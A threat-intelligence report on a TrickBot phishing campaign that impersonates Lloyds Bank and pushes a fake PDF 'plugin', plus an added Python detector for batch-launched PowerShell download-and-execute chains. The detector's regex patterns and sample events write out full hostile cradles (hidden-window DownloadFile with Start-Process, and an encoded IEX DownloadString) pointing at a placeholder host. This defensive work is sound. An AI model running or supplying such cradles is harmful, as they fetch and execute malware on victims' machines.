TrickBot Operators Rapidly Adopt “Plug In” for Delivery, Possibly Following Dreambot’s Lead
Recently, Cofense Intelligence reported on a new mechanism used to distribute Dreambot malware, where a malicious page impersonating Microsoft Office Online entices victims to download the banking trojan. We have noted a similar delivery technique in the distribution of a TrickBot sample: targets are told they must download a "plugin" to interact with a PDF, adding another instance of a purported "plugin" download being used for malware delivery. The campaign detailed here leverages social engineering to gain access to victims' sensitive information and uses code obfuscation to evade detection by security technologies.
This phishing lure is crafted to spoof the BACS (Bankers' Automated Clearing Services) brand and the Lloyds Bank brand and logo, indicating the phishers are likely targeting residents of the United Kingdom. The threat actors attempt to increase their perceived legitimacy by including a password for an allegedly urgent document, which is supposedly accessed via an embedded link (Figure 1). The link opens a browser window displaying an interactive PDF viewer. The overall sophistication of this phishing email, and of the social engineering employed after the initial click, suggests the TrickBot threat actors are attempting to fool more phishing-aware targets.
Figure 1: Lloyds Bank phishing message containing embedded link to a browser window
Hosted on a spoofed domain name, "lloydsbankdocs[.]com," the page renders a PDF viewer displaying a document purportedly created by "Lloyds Bank Group," as seen in Figure 2. When the user attempts to interact with the PDF viewer, a pop-up appears claiming that the document "cannot be read by current plugin version" (Figure 3).
Figure 2: Interactive PDF viewer impersonating Lloyds Bank
Figure 3: Pop-up prompting the victim to download an “Adobe PDF Web-Plugin”
Figure 5: Batch file uses PowerShell to download and run the TrickBot malware
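The chain shown in Figure 5 (a batch file that launches PowerShell to fetch and run the payload) leaves a recognizable process-creation footprint: cmd.exe running a .bat file spawns powershell.exe with a download cradle and an execute step, often with window-hiding or encoded-command flags. The following detection logic is an added example, not code from the original article or from Cofense; the event field names, the endpoint paths and every command line are constructed sample data, and the hostname example.invalid is a placeholder rather than a real payload location. It also handles the -EncodedCommand case, which the text's mention of obfuscation makes worth checking, by decoding the Base64/UTF-16LE script before matching.

```python
"""Flag batch-launched PowerShell download-and-execute chains in process-creation
events (Sysmon Event ID 1 style records, one JSON object per line).
Added example; field names and sample events are constructed, not real telemetry."""
import base64
import json
import re

# Indicators of a PowerShell download cradle (fetch a payload from the network).
DOWNLOAD = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|invoke-restmethod",
    re.I,
)
# Indicators that the fetched payload is then executed.
EXECUTE = re.compile(
    r"start-process|\bsaps\b|invoke-expression|\biex\b|invoke-item|&\s*['\"]", re.I
)
# Flags commonly used to hide the window, skip profiles, or smuggle an encoded script.
EVASION = re.compile(
    r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass"
    r"|-e(?:c|nc|ncodedcommand)?\b",
    re.I,
)
# Captures the Base64 blob following -e / -ec / -enc / -EncodedCommand.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the plaintext of a -EncodedCommand payload (UTF-16LE Base64), or ''."""
    m = ENCODED.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; returns alert flag, severity and reasons."""
    result = {"alert": False, "severity": "none", "reasons": [], "decoded": ""}
    if not event.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return result
    parent = event.get("parent_image", "").lower()
    parent_cl = event.get("parent_command_line", "")
    cl = event.get("command_line", "")

    decoded = decode_encoded_command(cl)
    result["decoded"] = decoded
    # Match the raw command line and the decoded script together, so that
    # -EncodedCommand cannot hide the cradle from the string checks.
    text = f"{cl}\n{decoded}"

    reasons = result["reasons"]
    if parent.endswith("cmd.exe") and re.search(r"\.(?:bat|cmd)\b", parent_cl, re.I):
        reasons.append("launched from a batch script via cmd.exe")
    if decoded:
        reasons.append("encoded command decoded")
    if DOWNLOAD.search(text):
        reasons.append("download cradle")
    if EXECUTE.search(text):
        reasons.append("executes fetched payload")
    if EVASION.search(cl):
        reasons.append("evasion flags")

    # Download plus execute is the core of the chain; batch parent or evasion
    # flags raise the severity but are not required for an alert.
    if "download cradle" in reasons and "executes fetched payload" in reasons:
        result["alert"] = True
        context = {"launched from a batch script via cmd.exe", "evasion flags"}
        result["severity"] = "high" if context & set(reasons) else "medium"
    return result


def scan(log_text: str) -> list:
    """Run analyze_event over JSON-lines input; return alerts with their line index."""
    alerts = []
    for index, line in enumerate(log_text.splitlines()):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than aborting the scan
        verdict = analyze_event(event)
        if verdict["alert"]:
            alerts.append({"index": index, **verdict})
    return alerts


# Constructed sample events; example.invalid stands in for the real payload host.
_TEMP = r"C:\Users\victim\AppData\Local\Temp"
_ENCODED_SCRIPT = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    .encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {   # benign admin use: interactive shell, no download
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "parent_command_line": "explorer.exe",
        "command_line": "powershell.exe -Command Get-Process",
    },
    {   # batch file launches PowerShell that downloads and runs a binary
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "parent_command_line": r'cmd.exe /c "C:\Users\victim\Downloads\AdobePDFWebPlugin.bat"',
        "command_line": (
            "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            f"'http://example.invalid/plugin.exe','{_TEMP}\\plugin.exe'); "
            f"Start-Process '{_TEMP}\\plugin.exe'\""
        ),
    },
    {   # same chain, but the cradle is hidden behind -EncodedCommand
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "parent_command_line": r'cmd.exe /c "C:\Users\victim\Downloads\plugin.bat"',
        "command_line": f"powershell.exe -enc {_ENCODED_SCRIPT}",
    },
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["index"], alert["severity"], "; ".join(alert["reasons"]))
```

The rule deliberately keys on the download-plus-execute pair rather than on any single string, so a plain `Invoke-WebRequest` from an admin does not fire, while the encoded variant is caught only because the Base64 script is decoded before matching. Tune the parent-process check to your own telemetry schema; field names here are assumptions.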
We continue to observe TrickBot's growing sophistication as the malware evolves in both its infection and its delivery methodology. The similarities to Dreambot's recent delivery highlight two possible factors that shape the phishing threat landscape. First, threat actors observe the work and success of others and can rapidly replicate and modify new tactics, techniques and procedures (TTPs). Second, this "plugin" delivery method may be part of a kit bought and sold among threat actor groups for the distribution of multiple prominent malware families.
Either way, enterprises must be prepared for the proliferation of increasingly convincing phishing lures. Organizations should establish a multifaceted defense strategy, one that includes user training and education so that employees can identify suspicious emails and prevent similar attacks against their infrastructure. To keep that training relevant and prepare for these threats, organizations need to integrate threat intelligence, so they understand explicitly how threat actors are adopting new TTPs, such as new delivery methods and increasingly convincing narratives, to compromise end users.
Indicators of Compromise (IOCs)
Dropped Batch file MD5:
Batch file payload location: